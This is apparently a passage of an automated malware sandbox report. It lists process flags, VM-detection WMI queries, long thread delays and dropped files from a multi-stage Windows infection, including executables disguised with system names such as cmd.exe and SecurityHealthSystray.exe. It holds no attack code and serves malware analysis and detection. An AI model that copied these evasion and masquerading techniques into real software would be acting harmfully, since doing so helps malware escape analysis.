Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
Source: C:\Windows\System32\getmac.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\ProgramData\main.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController

Source: C:\ProgramData\main.exe	Memory allocated: 25A8B9B0000 memory reserve \| memory write watch
Source: C:\ProgramData\main.exe	Memory allocated: 25AA5350000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Memory allocated: 2EF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Memory allocated: 1B1B0000 memory reserve \| memory write watch
Source: C:\Windows\Logs\SettingSync\cmd.exe	Memory allocated: 1780000 memory reserve \| memory write watch
Source: C:\Windows\Logs\SettingSync\cmd.exe	Memory allocated: 1B450000 memory reserve \| memory write watch
Source: C:\Windows\Logs\SettingSync\cmd.exe	Memory allocated: A20000 memory reserve \| memory write watch
Source: C:\Windows\Logs\SettingSync\cmd.exe	Memory allocated: 1A6B0000 memory reserve \| memory write watch

Source: C:\ProgramData\main.exe	Thread delayed: delay time: 922337203685477
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 600000
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599859
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599645
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599484
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599329
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 599141
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598984
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598827
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598699
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598531
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598312
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 598117
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597953
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597672
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597499
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597330
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 597141
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596953
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596750
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596547
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596406
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596219
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 596047
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595900
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595730
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595562
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595391
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595219
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 595000
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 594836
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 594687
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 594545
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 594437
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 594312
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 594187
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 594061
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 593953
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 593811
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 593666
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 593516
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 593312
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 593151
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 593036
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 592904
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 592783
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 592609
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 592462
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 592334
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 592203
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 592057
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 591930
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 591828
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 591703
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 591580
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 591446
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 591328
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 591187
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 591056
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 590950
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 590828
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 590714
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 590594
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 590422
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 590288
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 590169
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 590046
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 589891
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 589731
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 589605
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 589437
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 589271
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 589136
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 589014
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 588899
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 588797
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 588675
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 588484
Source: C:\ProgramData\main.exe	Thread delayed: delay time: 588352
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Logs\SettingSync\cmd.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Logs\SettingSync\cmd.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\SysWOW64\wscript.exe

Window found: window name: WSH-Timer

Source: C:\ProgramData\main.exe	Window / User API: threadDelayed 4729
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2616
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2324
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1977
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Window / User API: threadDelayed 4033
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Window / User API: threadDelayed 5963
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1088
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6110

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75002\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jXYEVzlL.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75002\_decimal.pyd	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\sirtu5ev\sirtu5ev.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\OaRiuQGD.log	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\python311.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\select.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qVMExOgA.log	Jump to dropped file
Source: C:\ProgramData\main.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Costura\A54E036D2DCD19384E8EA53862E0DD8F\64\sqlite.interop.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QXsqPQUy.log	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_bz2.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_lzma.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_hashlib.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75002\select.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\select.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_hashlib.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NMiIKuxG.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\NedIeTjA.log	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\unicodedata.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_decimal.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_queue.pyd	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\texuZkSn.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\SQHZBNGw.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_socket.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\cAOXqsEV.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_ssl.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\CyikYrPX.log	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\IibrXntG.log	Jump to dropped file
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI73082\_lzma.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\gngVTpTJ.log	Jump to dropped file
Source: C:\ProgramData\setup.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\etdFcppU.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75002\_lzma.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_ctypes.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\bRVpFOxY.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75002\libcrypto-1_1.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75002\python310.dll	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\_sqlite3.pyd	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\qejEhBzx.log	Jump to dropped file
Source: C:\ProgramData\Microsoft\hacn.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75002\_hashlib.pyd	Jump to dropped file
Source: C:\ProgramData\Microsoft\based.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI75162\python311.dll	Jump to dropped file
